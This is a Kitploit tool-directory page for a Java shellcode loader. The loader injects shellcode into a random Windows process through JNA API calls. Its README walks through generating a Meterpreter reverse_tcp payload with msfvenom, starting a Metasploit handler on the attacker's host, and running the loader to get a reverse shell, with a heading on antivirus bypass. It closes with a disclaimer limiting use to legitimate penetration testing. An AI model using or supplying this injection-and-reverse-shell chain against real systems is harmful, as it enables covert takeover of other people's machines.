Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Java-Shellcode-Loader — 基于Java实现的Shellcode加载器 | Kitploit
Tools/GitHubGitHub/yzddmr6/java-shellcode-loader
ShellcodePenetration TestingRed TeamingPayload Development
GitHubyzddmr6/java-shellcode-loader

Java-Shellcode-Loader

基于Java实现的Shellcode加载器

View Repository
41452113 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Java ShellCode Loader

A ShellCode loader implemented in Java, compatible with 32-bit and 64-bit platforms.

The core principle is to use Jna to call Windows APIs to achieve shellcode injection.

Runtime environment: Jre >= 1.5

Note: This project is already integrated into the ShellCodeLoader module of yzddmr6/As-Exploits.

Build

maven package

Usage

By default, a random 32-bit process will be injected; please use 32-bit shellcode.

root@kitploit:~
java -jar ShellcodeLoader.jar shellcode_hex

To inject x64 shellcode

root@kitploit:~
java -jar ShellcodeLoader.jar --x64 shellcode_hex

Examples

kali

Generate ShellCode in hex format

root@kitploit:~
┌──(root💀kali)-[~]
└─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.10 LPORT=4444 -f hex
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of hex file: 708 bytes
fce88f0000006089e531d2648b5....

Then start listening

root@kitploit:~
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.88.10
set LPORT 4444
exploit -j

Client side

root@kitploit:~
java -jar ShellcodeLoader.jar fce88f0000006089e531d2648b5....

You will then receive a reverse Meterpreter.

AV Bypass

image-20211205205857990

Notes

This project is provided only for legitimate penetration testing and for enthusiasts to learn and reference. Do not use it for illegal purposes; otherwise, you will bear the relevant responsibility yourself.

Download Tool